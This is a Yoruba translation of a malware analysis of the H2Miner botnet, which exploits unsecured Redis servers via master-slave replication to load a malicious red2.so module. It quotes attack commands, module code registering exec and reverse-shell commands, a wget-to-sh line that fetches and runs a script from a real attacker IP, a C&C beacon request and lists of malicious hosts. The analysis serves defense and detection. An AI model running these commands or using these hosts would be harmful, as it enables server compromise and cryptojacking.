Ni ọjọ kan sẹhin, ọkan ninu awọn olupin iṣẹ akanṣe mi ni ikọlu nipasẹ kokoro ti o jọra. Ni wiwa idahun si ibeere naa “kini iyẹn?” Mo rii nkan nla kan nipasẹ ẹgbẹ Aabo awọsanma Alibaba. Níwọ̀n bí n kò ti rí àpilẹ̀kọ yìí lórí Habré, mo pinnu láti túmọ̀ rẹ̀ ní pàtàkì fún ọ <3
Ifihan
Laipẹ, ẹgbẹ aabo Alibaba Cloud ṣe awari ibesile lojiji ti H2Miner. Iru alajerun irira yii nlo aini aṣẹ tabi awọn ọrọ igbaniwọle ailagbara fun Redis bi awọn ẹnu-ọna si awọn ọna ṣiṣe rẹ, lẹhin eyi o muuṣiṣẹpọ module irira tirẹ pẹlu ẹru nipasẹ imuṣiṣẹpọ oluwa-ẹrú ati nikẹhin ṣe igbasilẹ module irira yii si ẹrọ ti o kọlu ati ṣiṣẹ irira. ilana.
Ni iṣaaju, awọn ikọlu lori awọn eto rẹ ni a ṣe ni akọkọ nipa lilo ọna ti o kan awọn iṣẹ ṣiṣe ti a ṣeto tabi awọn bọtini SSH ti a kọ si ẹrọ rẹ lẹhin ikọlu wọle sinu Redis. O da, ọna yii ko le ṣee lo nigbagbogbo nitori awọn iṣoro pẹlu iṣakoso igbanilaaye tabi nitori awọn ẹya eto oriṣiriṣi. Sibẹsibẹ, ọna yii ti ikojọpọ module irira le ṣiṣẹ taara awọn aṣẹ ikọlu tabi ni iraye si ikarahun naa, eyiti o lewu fun eto rẹ.
Nitori nọmba nla ti awọn olupin Redis ti o gbalejo lori Intanẹẹti (o fẹrẹ to miliọnu 1), ẹgbẹ aabo Alibaba Cloud, bi olurannileti ọrẹ, ṣeduro pe awọn olumulo ko pin Redis lori ayelujara ati nigbagbogbo ṣayẹwo agbara awọn ọrọ igbaniwọle wọn ati boya wọn ti ni adehun. awọn ọna yiyan.
H2Miner
H2Miner jẹ botnet iwakusa fun awọn ọna ṣiṣe orisun Linux ti o le gbogun ti eto rẹ ni awọn ọna oriṣiriṣi, pẹlu aini aṣẹ ni Hadoop yarn, Docker, ati awọn ailagbara pipaṣẹ pipaṣẹ Redis latọna jijin (RCE). Botnet kan n ṣiṣẹ nipa gbigba awọn iwe afọwọkọ irira ati malware si data mi, faagun ikọlu ni ita, ati ṣetọju aṣẹ ati iṣakoso (C&C) awọn ibaraẹnisọrọ.
Redis RCE
Imọye lori koko-ọrọ yii ni a pin nipasẹ Pavel Toporkov ni ZeroNights 2018. Lẹhin ti ikede 4.0, Redis ṣe atilẹyin ẹya-ara ikojọpọ plug-in ti o fun awọn olumulo ni agbara lati fifuye ki awọn faili ti o ṣajọ pẹlu C sinu Redis lati ṣiṣẹ awọn aṣẹ Redis kan pato. Iṣẹ yii, botilẹjẹpe o wulo, ni ailagbara ninu eyiti, ni ipo ẹru oluwa, awọn faili le muuṣiṣẹpọ pẹlu ẹrú nipasẹ ipo isọdọkan kikun. Eyi le ṣee lo nipasẹ ikọlu lati gbe awọn faili irira lọ. Lẹhin ti gbigbe naa ti pari, awọn ikọlu naa gbe module naa sori apẹẹrẹ Redis ti o kọlu ati ṣiṣẹ eyikeyi aṣẹ.
Malware Alajerun Analysis
Laipe, ẹgbẹ aabo awọsanma Alibaba ṣe awari pe iwọn H2Miner ẹgbẹ iwakusa irira ti pọ si lojiji. Gẹgẹbi itupalẹ, ilana gbogbogbo ti iṣẹlẹ ikọlu jẹ atẹle yii:
H2Miner nlo RCE Redis fun ikọlu kikun. Awọn ikọlu kọlu awọn olupin Redis ti ko ni aabo tabi awọn olupin pẹlu awọn ọrọ igbaniwọle alailagbara.
Lẹhinna wọn lo aṣẹ naa config set dbfilename red2.so lati yi orukọ faili pada. Lẹhin eyi, awọn ikọlu ṣiṣẹ aṣẹ naa slaveof lati ṣeto awọn titunto si-ẹrú atunse ogun adirẹsi.
Nigbati apẹẹrẹ Redis ti o kọlu ṣe agbekalẹ asopọ titunto si-ẹrú pẹlu Redis irira ti o jẹ ohun ini nipasẹ ikọlu, ikọlu naa firanṣẹ module ti o ni ikolu nipa lilo pipaṣẹ isọdọkan kikun lati mu awọn faili ṣiṣẹpọ. Faili red2.so yoo ṣe igbasilẹ si ẹrọ ti o kọlu. Awọn ikọlu lẹhinna lo module ikojọpọ ./red2.so lati ṣaja faili bẹ. Module naa le ṣiṣẹ awọn aṣẹ lati ọdọ ikọlu kan tabi pilẹṣẹ asopọ yiyipada (ẹnu ẹhin) lati ni iraye si ẹrọ ti o kọlu.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Lẹhin ṣiṣe pipaṣẹ irira gẹgẹbi / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, awọn attacker yoo tun awọn afẹyinti faili orukọ ati ki o unload awọn eto module lati nu soke awọn wa. Sibẹsibẹ, faili red2.so yoo tun wa lori ẹrọ ti o kọlu. A gba awọn olumulo niyanju lati san ifojusi si wiwa iru faili ifura kan ninu folda ti apẹẹrẹ Redis wọn.
Ni afikun si pipa diẹ ninu awọn ilana irira lati ji awọn orisun, ikọlu naa tẹle iwe afọwọkọ irira nipa gbigba lati ayelujara ati ṣiṣe awọn faili alakomeji irira si . Eyi tumọ si pe orukọ ilana tabi orukọ ilana ti o ni ibatan lori agbalejo le fihan pe ẹrọ naa ti ni akoran nipasẹ ọlọjẹ yii.
Gẹgẹbi awọn abajade imọ-ẹrọ yiyipada, malware ni akọkọ ṣe awọn iṣẹ wọnyi:
- Ikojọpọ awọn faili ati ṣiṣe wọn
- Iwakusa
- Mimu ibaraẹnisọrọ C&C ati ṣiṣe awọn aṣẹ ikọlu
Lo masscan fun wíwo ita lati faagun ipa rẹ. Ni afikun, adiresi IP ti olupin C&C jẹ koodu-lile ninu eto naa, ati pe agbalejo ti o kọlu yoo ṣe ibasọrọ pẹlu olupin ibaraẹnisọrọ C&C nipa lilo awọn ibeere HTTP, nibiti a ti mọ alaye Zombie (olupin ti o gbogun) ni akọsori HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Awọn ọna ikọlu miiran
Awọn adirẹsi ati awọn ọna asopọ ti kokoro lo
/ ibatan
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Ni akọkọ, Redis ko yẹ ki o wa lati Intanẹẹti ati pe o yẹ ki o ni aabo pẹlu ọrọ igbaniwọle to lagbara. O tun ṣe pataki ki awọn alabara ṣayẹwo pe ko si faili red2.so ninu itọsọna Redis ati pe ko si “kinsing” ninu faili / ilana ilana lori agbalejo naa.
orisun: www.habr.com